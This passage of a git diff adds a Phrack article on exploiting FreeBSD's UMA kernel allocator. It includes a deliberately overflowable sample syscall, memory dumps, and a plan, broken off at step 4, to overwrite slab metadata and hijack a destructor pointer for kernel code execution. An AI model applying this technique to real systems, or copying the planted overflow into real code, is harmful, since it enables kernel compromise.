+MV=,J$:!*!$!\52)`E0A0)0)4B0!5(D"5"%`E`E2)`%4B0)4(4"4"5(D`52)`
+ME0A0)0)4B0!5(D"5"%`E`E2)`%6I2E6J4I6J5*4J5:E*5:I2E:I4I2I5^:;E
+*OP'CP.BZ`'@`````
+`
+end
+
+--------[ EOF
+
diff --git a/phrack66/8.txt b/phrack66/8.txt
new file mode 100644
index 0000000..5d18dcf
--- /dev/null
+++ b/phrack66/8.txt
@@ -0,0 +1,1513 @@
+				==Phrack Inc.==
+
+		Volume 0x0d, Issue 0x42, Phile #0x08 of 0x11
+
+|=-----------------------------------------------------------------------=|
+|=--------=[ Exploiting UMA, FreeBSD's kernel memory allocator ]=--------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[    By argp <argp@hushmail.com>,      ]=--------------=|
+|=---------------=[       karl <karl@signedness.org      ]=--------------=|
+|=-----------------------------------------------------------------------=|
+
+--[ Table of contents
+
+1 - Introduction
+2 - UMA: FreeBSD's kernel memory allocator
+3 - A sample vulnerability
+4 - Exploitation methodology
+  4.1 - Kernel shellcode
+  4.2 - Keeping the system stable
+5 - Conclusion
+6 - References
+7 - Code
+
+--[ 1 - Introduction
+
+The latest development version (8.0-CURRENT at the time of this writing)
+of FreeBSD has introduced stack-smashing detection and protection for the
+kernel by utilizing the incorporation of SSP in GCC [1, 2].  This creates
+an increased interest in exploring the FreeBSD kernel heap implementation,
+or zone allocator to be more precise, from a security perspective since it
+currently provides no exploitation mitigation mechanisms.
+
+This paper presents my findings on exploiting FreeBSD's kernel memory
+allocator, or UMA - the universal memory allocator [3, 4], on the IA-32
+platform.  While a certain amount of knowledge of the FreeBSD kernel's
+internals and IA-32 assembly would be useful in following the paper, they
+are not strictly required.  All presented details and supporting code have
+been tested on FreeBSD 7.0, 7.1, 7.2 and 8.0-CURRENT from 20090511, but
+since 7.2 is the latest stable version all code excerpts have been taken
+from it.
+
+--[ 2 - UMA: FreeBSD's kernel memory allocator
+
+UMA or the universal memory allocator, also referred to as a zone
+allocator in the documentation, is FreeBSD's kernel memory allocator that
+functions like a traditional slab allocator [5].  The main idea behind
+slab allocators is that they provide an efficient memory management
+front-end, usually divided into multiple layers, to the low-level page
+allocations by retaining the state of constant-sized items between uses.
+It is called a slab allocator since it initially allocates large areas, or
+slabs, of memory and then pre-allocates on them items of a particular type
+and size per slab.  When the kernel requests through the malloc(9)
+interface items of a certain type, a pre-allocated item that was marked as
+free from the corresponding slab is returned.  UMA is also used for
+arbitrary-sized malloc(9) requests in which case the requested size is
+adjusted for alignment to find the suitable slab.  The advantages of this
+approach are no fragmentation of the kernel's memory and increased
+performance since the items are pre-allocated and grouped to slabs
+according to their size.
+
+The exploitation of slab overflow vulnerabilities has been investigated in
+the past by twiz and sgrakkyu in the context of the Linux and Solaris
+kernels [6].  Specifically, they have identified that slab overflows may
+lead to corruptions of a) adjacent items on a slab, b) page frames that
+are adjacent to the last item of a slab, or c) slab control structures.
+The example they give in [6] uses approach a) to exploit Linux kernel slab
+overflows.  On FreeBSD I use approach c).
+
+Since FreeBSD's UMA implementation uses the terms 'zone' and 'slab' to
+refer to conceptually different things, I will now stop using them
+interchangeably.  A full explanation of both is given below, just keep in
+mind for the time being that in the context of the FreeBSD kernel a zone
+and a slab are not the same thing.
+
+On FreeBSD we can use the vmstat(8) utility to get a report on the
+different types of zones that the kernel has created for its data
+structures, and their characteristics like name, size of the type of item
+allocated on them, number of items currently in use, and number of free
+items per zone, among others:
+
+[argp@julius ~]$ vmstat -z
+ITEM                SIZE     LIMIT      USED      FREE  REQUESTS  FAILURES
+
+UMA Kegs:           128,        0,       94,       26,       94,        0
+UMA Zones:          480,        0,       94,        2,       94,        0
+UMA Slabs:           64,        0,      353,        1,      712,        0
+UMA RCntSlabs:      104,        0,       69,        5,       69,        0
+UMA Hash:           128,        0,        6,       24,        7,        0
+16 Bucket:           76,        0,       31,       19,       50,        0
+32 Bucket:          140,        0,       20,        8,       41,        0
+64 Bucket:          268,        0,       27,        1,       76,       11
+128 Bucket:         524,        0,       18,        3,      975,       30
+VM OBJECT:          124,        0,      830,       69,    12161,        0
+MAP:                140,        0,        7,       21,        7,        0
+KMAP ENTRY:          68,    15512,       24,      200,     1750,        0
+MAP ENTRY:           68,        0,      555,      117,    24862,        0
+DP fakepg:           72,        0,        0,        0,        0,        0
+mt_zone:           1032,        0,      255,      129,      255,        0
+16:                  16,        0,     2250,      389,    15191,        0
+32:                  32,        0,     1163,       80,    10077,        0
+64:                  64,        0,     3244,       60,     5149,        0
+128:                128,        0,     1493,      187,     5820,        0
+256:                256,        0,      308,        7,     3591,        0
+512:                512,        0,       43,       13,      827,        0
+1024:              1024,        0,       47,       81,     1405,        0
+2048:              2048,        0,      314,        6,      491,        0
+4096:              4096,        0,      101,       12,     4900,        0
+Files:               76,        0,       51,       99,     3803,        0
+TURNSTILE:           76,        0,       78,       66,       78,        0
+umtx pi:             52,        0,        0,        0,        0,        0
+PROC:               696,        0,       62,       18,      839,        0
+THREAD:             556,        0,       76,        1,       76,        0
+UPCALL:              44,        0,        0,        0,        0,        0
+SLEEPQUEUE:          32,        0,       78,      148,       78,        0
+VMSPACE:            232,        0,       20,       31,      797,        0
+cpuset:              40,        0,        2,      182,        2,        0
+audit_record:       856,        0,        0,        0,        0,        0
+mbuf_packet:        256,        0,        0,      128,       26,        0
+mbuf:               256,        0,        1,      141,      778,        0
+mbuf_cluster:      2048,     8768,      128,        6,      141,        0
+
+...
+
+Mountpoints:        716,        0,        5,        5,        5,        0
+FFS inode:          128,        0,      429,       21,      451,        0
+FFS1 dinode:        128,        0,        0,        0,        0,        0
+FFS2 dinode:        256,        0,      429,       21,      451,        0
+SWAPMETA:           276,    30548,        0,        0,        0,        0
+
+FreeBSD's UMA implementation uses a number of different structures to
+manage kernel virtual memory.  All of these structures can be found in
+src/sys/vm/uma_int.h.  The fundamental one is the zone which is defined as
+a struct of type uma_zone [7]:
+
+struct uma_zone {
+    char        *uz_name;   /* Text name of the zone */
+    struct mtx  *uz_lock;   /* Lock for the zone (keg's lock) */
+    uma_keg_t   uz_keg;     /* Our underlying Keg */                [2-1]
+
+    LIST_ENTRY(uma_zone)    uz_link;        \
+                        /* List of all zones in keg */              [2-2]
+    LIST_HEAD(,uma_bucket)  uz_full_bucket; /* full buckets */      [2-3]
+    LIST_HEAD(,uma_bucket)  uz_free_bucket; /* Buckets for frees */ [2-4]
+
+    uma_ctor    uz_ctor;    /* Constructor for each allocation */
+    uma_dtor    uz_dtor;    /* Destructor */                        [2-5]
+    uma_init    uz_init;    /* Initializer for each item */
+    uma_fini    uz_fini;    /* Discards memory */
+
+    u_int64_t   uz_allocs;  /* Total number of allocations */
+    u_int64_t   uz_frees;   /* Total number of frees */
+    u_int64_t   uz_fails;   /* Total number of alloc failures */
+    uint16_t    uz_fills;   /* Outstanding bucket fills */
+    uint16_t    uz_count;   /* Highest value ub_ptr can have */
+
+    /*
+     * This HAS to be the last item because we adjust the zone size
+     * based on NCPU and then allocate the space for the zones.
+     */
+    struct uma_cache    uz_cpu[1];  /* Per cpu caches */
+};
+
+Each uma_zone structure is created to allocate a specific type of kernel
+memory and is itself allocated on a zone called 'UMA Zones'.  As we can
+see, uma_zone contains function pointers for allowing the kernel
+programmer to define custom constructors and destructors for each
+allocated item.  This is an important detail to keep in mind when we are
+looking for a way to divert the flow of execution after an overflow.
+uma_zone also holds statistical data for the zone, like the total numbers
+of allocations, frees and failures.  Most importantly, a zone structure
+also contains two lists of uma_bucket structures, or buckets, which cache
+items that have been allocated/deallocated from the zone's slabs.  These
+buckets are defined as follows [8]:
+
+struct uma_bucket {
+    LIST_ENTRY(uma_bucket)  ub_link;    /* Link into the zone */
+    int16_t ub_cnt;                     /* Count of free items. */
+    int16_t ub_entries;                 /* Max items. */
+    void    *ub_bucket[];               /* actual allocation storage */
+};
+
+In a uma_zone struct the uz_free_bucket list at [2-4] holds buckets to be
+used for deallocations of items, while the uz_full_bucket list at [2-3]
+for allocations.
+
+To enhance performance on multiprocessor systems each zone also has an
+array of per-CPU caches that are logically on top of the zone's buckets.
+These are defined structures of type uma_cache [9]:
+
+struct uma_cache {
+    uma_bucket_t    uc_freebucket;  /* Bucket we're freeing to */
+    uma_bucket_t    uc_allocbucket; /* Bucket to allocate from */
+    u_int64_t       uc_allocs;      /* Count of allocations */
+    u_int64_t       uc_frees;       /* Count of frees */
+};
+
+A keg is another UMA structure used for back-end allocation that describes
+the format of the underlying page(s) on which the items of the
+corresponding zone are stored.  Kegs are of type struct uma_keg [10]:
+
+struct uma_keg {
+    LIST_ENTRY(uma_keg) uk_link;    /* List of all kegs */
+
+    struct mtx  uk_lock;            /* Lock for the keg */
+    struct uma_hash uk_hash;
+
+    LIST_HEAD(,uma_zone)    uk_zones;       \
+                                /* Keg's zones */               [2-6]
+    LIST_HEAD(,uma_slab)    uk_part_slab;   \
+                                /* partially allocated slabs */ [2-7]
+    LIST_HEAD(,uma_slab)    uk_free_slab;   \
+                                /* empty slab list */           [2-8]
+    LIST_HEAD(,uma_slab)    uk_full_slab;   \
+                                /* full slabs */                [2-9]
+
+    u_int32_t   uk_recurse;     /* Allocation recursion count */
+    u_int32_t   uk_align;       /* Alignment mask */
+    u_int32_t   uk_pages;       /* Total page count */
+    u_int32_t   uk_free;        /* Count of items free in slabs */
+    u_int32_t   uk_size;        /* Requested size of each item */
+    u_int32_t   uk_rsize;       /* Real size of each item */
+    u_int32_t   uk_maxpages;    /* Maximum number of pages to alloc */
+
+    uma_init    uk_init;        /* Keg's init routine */
+    uma_fini    uk_fini;        /* Keg's fini routine */
+    uma_alloc   uk_allocf;      /* Allocation function */
+    uma_free    uk_freef;       /* Free routine */
+
+    struct vm_object    *uk_obj;    /* Zone specific object */
+    vm_offset_t uk_kva;         /* Base kva for zones with objs */
+    uma_zone_t  uk_slabzone;    \
+                        /* Slab zone backing us, if OFFPAGE */  [2-10]
+
+    u_int16_t   uk_pgoff;   /* Offset to uma_slab struct */     [2-11]
+    u_int16_t   uk_ppera;   /* pages per allocation from backend */
+    u_int16_t   uk_ipers;   /* Items per slab */
+    u_int32_t   uk_flags;   /* Internal flags */
+};
+
+While it is possible for a zone to be associated with more than one keg
+for receiving allocations from multiple source pages, it is not a very
+common occurrence (except in some network optimization cases for example)
+and therefore we will focus on the case of having an one-to-one
+association between kegs and zones.  When a zone is created by the kernel,
+the corresponding keg is created as well.  A zone's keg holds three lists
+of slabs:
+
+    * uk_full_slab is the list which holds full slabs; that is slabs on
+    which all items are marked as being used or allocated [2-9],
+    
+    * uk_free_slab holds slabs on which all items are marked as not being
+    used or free [2-8],
+    
+    * the uk_part_slab list holds slabs which contain both allocated and
+    free items [2-7].
+
+Each slab is of size UMA_SLAB_SIZE which is equal to PAGE_SIZE, which by
+default is set to 4096 bytes.  Slabs are described by uma_slab structures
+[11]:
+
+struct uma_slab {
+    struct uma_slab_head    us_head;    /* slab header data */  [2-12]
+    struct {
+            u_int8_t        us_item;
+    } us_freelist[1];                   /* actual number bigger */
+};
+
+The slab header structure, uma_slab_head at [2-12], contains the metadata
+that are necessary for the management of the slab/page [12]:
+
+struct uma_slab_head {
+    uma_keg_t   us_keg;                 /* Keg we live in */    [2-13]
+    union {
+            LIST_ENTRY(uma_slab)    _us_link;   /* slabs in zone */
+            unsigned long   _us_size;   /* Size of allocation */
+    } us_type;
+    SLIST_ENTRY(uma_slab)   us_hlink;   /* Link for hash table */
+    u_int8_t    *us_data;               /* First item */
+    u_int8_t    us_flags;               /* Page flags see uma.h */
+    u_int8_t    us_freecount;   /* How many are free? */
+    u_int8_t    us_firstfree;   /* First free item index */
+};
+
+So, to put it all together, each zone holds buckets of items that are
+allocated from the zone's slabs.  Each zone is also associated with a keg
+which holds the zone's slabs.  Each slab is of the same size as a page
+frame (usually 4096 bytes) and has a slab header structure which contains
+management metadata.  The following diagram ties together all the UMA data
+structures we have analyzed so far:
+
+ ...................
+ |  +-----------+  |
+ |  |CPU 0 cache|  |
+ |  +-----------+  |
+ |                 |
+ |.--------------. |
+ ||  uma_cache   | |   .--------.                  .-------.
+ ||     ...      |<----|uma_zone|----------------->|uma_keg|
+ ||uc_freebucket | |   `--------'                  `-------'
+ ||uc_allocbucket| |        |                          |
+ |`|-------------' |        |                          |
+ '`|''''''''''''''''        |                          |
+   |                        |                          |
+   |         +--------------+-------+                  |
+   |         |                      |                  |
+   |         |                      |                  |
+   |         v                      v                  |
+   |  uz_full_bucket         uz_free_bucket            |
+   |    .----------.           .----------.            |
+   |    |.----------.          |.----------.           |
+   |    `|.----------.         `|.----------.          |
+   |     `|.----------.         `|.----------.         |
+   +----->`|uma_bucket|         .`|uma_bucket|         |
+   |       `----------'       .   `----------'         |
+   |          .             .           ^              |
+   |          .           .             |              |
+   +----------.---------.---------------+              |
+              .       .                                |
+              .     .      +------------------+--------+-----------+
+              .   .        |                  |                    |
+              . .          v                  v                    v
+              .       uk_part_slab       uk_free_slab       uk_full_slab
+              .         .--------.         .--------.         .--------.
+              .         |.--------.        |.--------.        |.--------.
+              .         `|.--------.       `|.--------.       `|.--------.
+              .          `|.--------.       `|.--------.       `|.--------.
+              .           `|uma_slab|        `|uma_slab|        `|uma_slab|
+              .            `--------'.        `--------'         `--------'
+              .                        .          .            .
+              .                          .        .         .
+              .                        .----------------------.
+              .                        |      uma_slab        |
+              .                        |                      |
+ .------------------------.            |   .-------------.    |
+ |                        |            |   |uma_slab_head|    |
+ |      uma_bucket        |            |   `-------------'    |
+ |         ...            |            | .------------------. |
+ |  .------------------.  |            | |struct {          | |
+ |  |void *ub_bucket[];|---------------->|u_int8_t us_item  | |
+ |  `------------------'  |            | |} us_freelist[];  | |
+ `------------------------'            | `------------------' |
+                                       `----------------------'
+
+Depending on the size of the items a slab has been divided into for, the
+uma_slab structure may or may not be embedded in the slab itself.  For
+example, let's consider the anonymous zones ('4096', '2048', '1024', ...,
+'16') which serve malloc(9) requests of arbitrary sizes by adjusting for
+alignment purposes the requested size to the nearest zone.  The '512' zone
+is able to store eight items of 512 bytes in every slab associated with
+it.  The uma_slab structure in this case is stored offpage on a UMA zone
+that has been allocated for this purpose.  The uma_keg structure
+associated with the '512' zone actually contains a uma_zone pointer to
+this slab zone (uk_slabzone at [2-10]) and an unsigned 16-bit integer that
+specifies the offset to the corresponding uma_slab structure (uk_pgoff at
+[2-11]).
+
+On the other hand, the slabs of the '256' anonymous zone store fifteen
+items (of size 256 bytes each) and in this case the uma_slab stuctures are
+stored onto the slabs themselves after the memory reserved for items.
+These two slab representations are actually illustrated in a comment in
+the FreeBSD code repository [13].  We include the diagram here since it is
+crucial for the understanding of the slab structure ('i' represents a slab
+item):
+
+Non-offpage slab
+___________________________________________________________
+| _  _  _  _  _  _  _  _  _  _  _  _  _  _  _   ___________ |
+||i||i||i||i||i||i||i||i||i||i||i||i||i||i||i| |slab header||
+||_||_||_||_||_||_||_||_||_||_||_||_||_||_||_| |___________||
+|___________________________________________________________|
+
+Offpage slab
+___________________________________________________________
+| _  _  _  _  _  _  _  _  _  _  _  _  _  _  _  _  _  _  _   |
+||i||i||i||i||i||i||i||i||i||i||i||i||i||i||i||i||i||i||i|  |
+||_||_||_||_||_||_||_||_||_||_||_||_||_||_||_||_||_||_||_|  |
+|___________________________________________________________|
+ ___________    ^
+|slab header|   |
+|___________|---+
+
+--[ 3 - A sample vulnerability
+
+In order to explore the possibility of exploiting UMA related overflows we
+will add a new system call to FreeBSD via the dynamic kernel linker (KLD)
+facility [14].  The new system call will use malloc(9) and introduce an
+overflow on UMA managed memory.  This sample vulnerability is based on the
+signedness.org challenge #3 by karl [15] (we don't include the complete
+KLD module here, see file bug/bug.c in the code archive for the full
+code):
+
+#define SLOTS 100
+
+static char *slots[SLOTS];
+
+#define OP_ALLOC    1
+#define OP_FREE     2
+
+struct argz
+{
+    char *buf;
+    u_int len;
+    int op;
+    u_int slot;
+};
+
+static int
+bug(struct thread *td, void *arg)
+{
+    struct argz *uap = arg;
+
+    if(uap->slot >= SLOTS)
+    {
+        return 1;
+    }
+
+    switch(uap->op)
+    {
+        case OP_ALLOC:
+            if(slots[uap->slot] != NULL)
+            {
+                return 2;
+            }
+            
+[3-1]       slots[uap->slot] = malloc(uap->len & ~0xff, M_TEMP, M_WAITOK);
+            if(slots[uap->slot] == NULL)
+            {
+                return 3;
+            }
+
+            uprintf("[*] bug: %d: item at %p\n", uap->slot,
+                    slots[uap->slot]);
+            
+[3-2]       copyin(uap->buf, slots[uap->slot] , uap->len);
+            break;
+        
+        case OP_FREE:
+            if(slots[uap->slot] == NULL)
+            {
+                return 4;
+            }
+            
+[3-3]       free(slots[uap->slot], M_TEMP);
+            slots[uap->slot] = NULL;
+            break;
+
+        default:
+            return 5;
+    }
+
+    return 0;
+}
+
+The new system call is named 'bug'.  At [3-1] we can see that malloc(9)
+does not request the exact amount of memory specified by the system call
+arguments (and therefore the user), but then in [3-2] the user-specified
+length is used in copyin(9) to copy userland memory to the UMA managed
+kernel space memory.  In [3-3] we can see that the new system call also
+provides for us a away to deallocate a previously allocated slab item.
+After compiling and loading the new KLD module we need a userland program
+that uses the new system call 'bug'.  Using this we populate the slabs of
+the '256' anonymous zone with a number of items filled with '0x41's (file
+exhaust.c in the code archive):
+
+// Initially we load the KLD:
+[root@julius ~/code/bug]# kldload -v ./bug.ko
+bug loaded at 210
+Loaded ./bug.ko, id=4
+
+// As a normal user we can now use exhaust.c:
+[argp@julius ~/code/bug]$ kldstat | grep bug
+ 4    1 0xc263f000 2000     bug.ko
+[argp@julius ~/code/bug]$ vmstat -z | grep 256:
+256:                      256,        0,      310,       35,     9823,        0
+[argp@julius ~/code/bug]$ ./exhaust 20
+[*] bug: 0: item at 0xc25db300
+[*] bug: 1: item at 0xc25db700
+[*] bug: 2: item at 0xc25da100
+[*] bug: 3: item at 0xc2580700
+[*] bug: 4: item at 0xc2580500
+[*] bug: 5: item at 0xc25daa00
+[*] bug: 6: item at 0xc2580200
+[*] bug: 7: item at 0xc2434100
+[*] bug: 8: item at 0xc25db000
+[*] bug: 9: item at 0xc25dba00
+[*] bug: 10: item at 0xc2580900
+[*] bug: 11: item at 0xc25dab00
+[*] bug: 12: item at 0xc25db200
+[*] bug: 13: item at 0xc25db400
+[*] bug: 14: item at 0xc25db500
+[*] bug: 15: item at 0xc257fe00
+[*] bug: 16: item at 0xc2434000
+[*] bug: 17: item at 0xc25db100
+[*] bug: 18: item at 0xc2580e00
+[*] bug: 19: item at 0xc25dad00
+[argp@julius ~/code/bug]$ vmstat -z | grep 256:
+256:                      256,        0,      330,       15,     9873,        0
+
+As we can see from the output of vmstat(8), the number of items marked as
+free have been reduced from 35 to 15 (since we have consumed 20).
+
+UMA prefers slabs from the partially allocated list (uk_part_slab [2-7])
+in order to satisfy requests for items, thus reducing fragmentation.  To
+further explore the behavior of UMA, we will write another userland
+program that parses the output of 'vmstat -z' and extracts the number of
+free items on the '256' zone.  Then it will use the new 'bug' system call
+to consume/allocate this number of items.  UMA will subsequently create a
+number of new slabs and our userland program will continue and
+consume/allocate another fifteen items (fifteen is the maximum number of
+items that a slab of the '256' zone can hold; getzfree.c is available in
+the code archive):
+
+// Again, we load the KLD as root:
+[root@julius ~/code/bug]# kldload -v ./bug.ko
+bug loaded at 210
+Loaded ./bug.ko, id=4
+
+// As a normal user we can now use getzfree.c:
+[argp@julius ~/code/bug]$ ./getzfree 
+---[ free items on the 256 zone: 41
+---[ consuming 41 items from the 256 zone
+[*] bug: 0: item at 0xc25e4900
+[*] bug: 1: item at 0xc2592300
+[*] bug: 2: item at 0xc25e4300
+[*] bug: 3: item at 0xc25e4a00
+[*] bug: 4: item at 0xc25e3600
+[*] bug: 5: item at 0xc25e4400
+[*] bug: 6: item at 0xc25e4000
+[*] bug: 7: item at 0xc25e4b00
+[*] bug: 8: item at 0xc25e4c00
+[*] bug: 9: item at 0xc25e3500
+[*] bug: 10: item at 0xc25e4e00
+[*] bug: 11: item at 0xc25e4100
+[*] bug: 12: item at 0xc2593a00
+[*] bug: 13: item at 0xc25e3700
+[*] bug: 14: item at 0xc25e4200
+[*] bug: 15: item at 0xc2592200
+[*] bug: 16: item at 0xc2381800
+[*] bug: 17: item at 0xc2593d00
+[*] bug: 18: item at 0xc2592600
+[*] bug: 19: item at 0xc2592500
+[*] bug: 20: item at 0xc235d900
+[*] bug: 21: item at 0xc2434b00
+[*] bug: 22: item at 0xc2592800
+[*] bug: 23: item at 0xc2434800
+[*] bug: 24: item at 0xc2592000
+[*] bug: 25: item at 0xc2435e00
+[*] bug: 26: item at 0xc25e4d00
+[*] bug: 27: item at 0xc25e4600
+[*] bug: 28: item at 0xc25e3d00
+[*] bug: 29: item at 0xc25e3c00
+[*] bug: 30: item at 0xc25e4500
+[*] bug: 31: item at 0xc25e3900
+[*] bug: 32: item at 0xc25e4700
+[*] bug: 33: item at 0xc25e3b00
+[*] bug: 34: item at 0xc25e3000
+[*] bug: 35: item at 0xc25e3200
+[*] bug: 36: item at 0xc25e3800
+[*] bug: 37: item at 0xc25e3300
+[*] bug: 38: item at 0xc25e3100
+[*] bug: 39: item at 0xc25e4800
+[*] bug: 40: item at 0xc25e3a00
+---[ free items on the 256 zone: 45
+---[ allocating 15 items on the 256 zone...
+[*] bug: 41: item at 0xc25e6800
+[*] bug: 42: item at 0xc25e6700
+[*] bug: 43: item at 0xc25e6600
+[*] bug: 44: item at 0xc25e6500
+[*] bug: 45: item at 0xc25e6400
+[*] bug: 46: item at 0xc25e6300
+[*] bug: 47: item at 0xc25e6200
+[*] bug: 48: item at 0xc25e6100
+[*] bug: 49: item at 0xc25e6000
+[*] bug: 50: item at 0xc25e5e00
+[*] bug: 51: item at 0xc25e5d00
+[*] bug: 52: item at 0xc25e5c00
+[*] bug: 53: item at 0xc25e5b00
+[*] bug: 54: item at 0xc25e5a00
+[*] bug: 55: item at 0xc25e5900
+
+During the initial allocations the items are placed at seemingly
+unpredictable locations due to the fact that the items are actually
+allocated in free spots on partially full existing slabs.  After the
+current number of free items of the '256' zone is consumed, we can see
+that the next allocations follow a pattern from higher to lower addresses.
+Another useful observation we can make is that we always get a final item
+of a slab (i.e. at address 0x_____e00 for the '256' zone) somewhere in the
+next fifteen, or generally ITEMS_PER_SLAB, item allocations of newly
+created slabs.  Since we know that the slabs of the '256' anonymous zone
+have their uma_slab structures stored onto the slabs themselves, we can
+explore the kernel memory with ddb(4) [16] and try to identify the
+different UMA structures we have presented in the previous section.
+
+// We start by examining the memory at item #51 (0xc25e5d00).
+db> x/x 0xc25e5d00,100
+0xc25e5d00:     41414141        41414141        41414141        41414141
+0xc25e5d10:     41414141        41414141        41414141        41414141
+0xc25e5d20:     41414141        41414141        41414141        41414141
+0xc25e5d30:     41414141        41414141        41414141        41414141
+0xc25e5d40:     41414141        41414141        41414141        41414141
+0xc25e5d50:     41414141        41414141        41414141        41414141
+0xc25e5d60:     41414141        41414141        41414141        41414141
+0xc25e5d70:     41414141        41414141        41414141        41414141
+0xc25e5d80:     41414141        41414141        41414141        41414141
+0xc25e5d90:     41414141        41414141        41414141        41414141
+0xc25e5da0:     41414141        41414141        41414141        41414141
+0xc25e5db0:     41414141        41414141        41414141        41414141
+0xc25e5dc0:     41414141        41414141        41414141        41414141
+0xc25e5dd0:     41414141        41414141        41414141        41414141
+0xc25e5de0:     41414141        41414141        41414141        41414141
+0xc25e5df0:     41414141        41414141        41414141        41414141
+
+// Item #50 (0xc25e5e00) starts here, as we can see there are no metadata
+// between items on the slab.
+0xc25e5e00:     41414141        41414141        41414141        41414141
+0xc25e5e10:     41414141        41414141        41414141        41414141
+0xc25e5e20:     41414141        41414141        41414141        41414141
+0xc25e5e30:     41414141        41414141        41414141        41414141
+0xc25e5e40:     41414141        41414141        41414141        41414141
+0xc25e5e50:     41414141        41414141        41414141        41414141
+0xc25e5e60:     41414141        41414141        41414141        41414141
+0xc25e5e70:     41414141        41414141        41414141        41414141
+0xc25e5e80:     41414141        41414141        41414141        41414141
+0xc25e5e90:     41414141        41414141        41414141        41414141
+0xc25e5ea0:     41414141        41414141        41414141        41414141
+0xc25e5eb0:     41414141        41414141        41414141        41414141
+0xc25e5ec0:     41414141        41414141        41414141        41414141
+0xc25e5ed0:     41414141        41414141        41414141        41414141
+0xc25e5ee0:     41414141        41414141        41414141        41414141
+0xc25e5ef0:     41414141        41414141        41414141        41414141
+0xc25e5f00:     0               0               0               0
+0xc25e5f10:     0               0               0               0
+0xc25e5f20:     0               0               0               0
+0xc25e5f30:     0               0               0               0
+0xc25e5f40:     0               28203263        0               0
+0xc25e5f50:     0               0               0               0
+0xc25e5f60:     28203264        28203264        0               0
+0xc25e5f70:     0               0               0               0
+0xc25e5f80:     0               0               0               0
+0xc25e5f90:     0               0               2820b080        4
+
+// At 0xc25e5fa8 the uma_slab_head structure of the uma_zone structure
+// begins with the address of the keg (variable us_keg at [2-13]) that the
+// slab belongs to (0xc1474900).
+0xc25e5fa0:     0               0               c1474900        c25e4fa8
+0xc25e5fb0:     c25e6fac        0               c25e5000        f0002
+0xc25e5fc0:     4030201         8070605         c0b0a09         f0e0d
+0xc25e5fd0:     0               0               0               0
+0xc25e5fe0:     828             0               0               0
+0xc25e5ff0:     0               0               0               0
+
+// The first item of the 0xc25e6fa8 slab starts here.
+0xc25e6000:     41414141        41414141        41414141        41414141
+
+// Now let's examine the entire keg structure of our slab.  Walking through
+// the memory dump with the aid of the description of the uma_keg structure
+// [10] we can easily identify the address of the keg's zone (0xc146d1e0).
+// This is variable uk_zones at [2-6].
+db> x/x 0xc1474900,20
+0xc1474900:     c1474880        c1474980        c0b865cc        c0bd809a
+0xc1474910:     1430000         0               4               0
+0xc1474920:     0               0               0               c146d1e0
+0xc1474930:     c25e7fa8        0               c25e6fa8        0
+0xc1474940:     3               1a              d               100
+0xc1474950:     100             0               0               0
+0xc1474960:     c09e35f0        c09e35b0        0               0
+0xc1474970:     0               10fa8           f               10
+
+// The memory region of the zone that our slab belongs to (through the keg)
+// is shown below.  Using uma_zone's definition from [7] we can easily
+// identify that at address 0xc146d200 we have the uz_dtor function
+// pointer [2-5], among other interesting function pointers.  The default
+// value of the uz_dtor function pointer is NULL (0x0) for the '256'
+// anonymous zone.
+db> x/x 0xc146d1e0,20
+0xc146d1e0:     c0b865cc        c1474908        c1474900        0
+0xc146d1f0:     c147492c        0               0               0
+0xc146d200:     0               0               0               f52
+0xc146d210:     0               df9             0               0
+0xc146d220:     0               200000          c146b000        c146b1a4
+0xc146d230:     2d1             0               2c5             0
+0xc146d240:     0               0               0               0
+0xc146d250:     0               0               0               0
+
+To summarize this section before we present the actual exploitation
+methodology:
+
+    * We have observed that if we can consume a zone's free items
+    and force the allocation of new items on new slabs, we can get an
+    item at the edge of one of the new slabs within the first
+    ITEMS_PER_SLAB number of items,
+
+    * for certain zones their slabs' management metadata, i.e. their
+    uma_slab structure which contains the uma_slab_head structure, are
+    stored on the slabs themselves,
+
+    * with the goal of achieving arbitrary code execution in mind, we have
+    examined the uma_slab_head, uma_keg and uma_zone structures in memory
+    and identified several function pointers that could be overwritten.
+
+--[ 4 - Exploitation methodology
+
+As we have seen in the previous section, the uma_slab_head structure of a
+non-offpage slab is stored on the slab itself at a higher memory address
+than the items of the slab.  Taking advantage of an insufficient input
+validation vulnerability on kernel memory managed by a zone with
+non-offpage slabs (like for example the '256' zone), we can overflow the
+last item of the slab and overwrite the uma_slab_head structure [12].
+This opens up a number of different alternatives for diverting the flow of
+the kernel's execution.  In this paper we will only explore the one we
+have found to be easier to achieve that also allows us to leave the system
+in a stable state after exploitation.
+
+Returning to the sample vulnerability of our new 'bug' system call, we
+have discovered that the uz_dtor function pointer is NULL for the '256'
+anonymous zone.  However, if we manage to modify it to point to an
+arbitrary address we can divert the flow of execution to our code during
+the deallocation of the edge item from the underlying slab.  When free(9)
+is called on a memory address the corresponding slab is discovered from
+the address passed as an argument [17]:
+
+slab = vtoslab((vm_offset_t)addr & (~UMA_SLAB_MASK));
+
+The slab is then used to find the keg's address to which it belongs, and
+then the keg's address is used to find the zone (or, to be more precise,
+the first zone in case the keg is associated with multiple zones) which is
+subsequently passed to the uma_zfree_arg() function [18]:
+
+uma_zfree_arg(LIST_FIRST(&slab->us_keg->uk_zones), addr, slab);
+
+In uma_zfree_arg() the zone passed as the first argument is used to find
+the corresponding keg [19]:
+
+keg = zone->uz_keg;
+
+Finally, if the uz_dtor function pointer of the zone is not NULL then it
+is called on the item to be deallocated in order to implement the custom
+destructor that a kernel developer may have defined for the zone [20]:
+
+if (zone->uz_dtor)
+        zone->uz_dtor(item, keg->uk_size, udata);
+
+This leads to the formulation of our exploitation methodology (although
+our sample vulnerability is for the '256' zone, we try to make the steps
+generic to apply to all zones with non-offpage slabs):
+
+1. Using vmstat(8) we query the UMA about the different zones, we identify
+   the one we plan to target and parse the number of initial items marked
+   as free on its slabs.
+
+2. Using a system call, or some other code path that allows us to affect
+   kernel space memory from userland, we consume all the free items from
+   the target zone.
+
+3. Based on our heuristic observations, we then allocate ITEMS_PER_SLAB
+   number of items on the target zone.  Although we don't know exactly
+   which allocation will give us an item at the edge of a slab (it differs
+   among different kernels), it will be one among the ITEMS_PER_SLAB
+   number of allocations.  On all these allocations we trigger the
+   vulnerability condition, therefore the item allocated last on a slab
+   will overflow into the memory region of the slab's uma_slab_head
+   structure.
+
+4. We overwrite the memory address of us_keg [2-13] in uma_slab_head with
+   an arbitrary address of our choosing.  Since the IA-32 architecture 
+   does not implement a fully separated memory address space between
+   userland and kernel space, we can use a userland address for this
+   purpose; the kernel will dereference it correctly.  There are a number
+   of choices for that, but the most convenient one is usually the
+   userland buffer passed as an argument to the vulnerable system call.
+
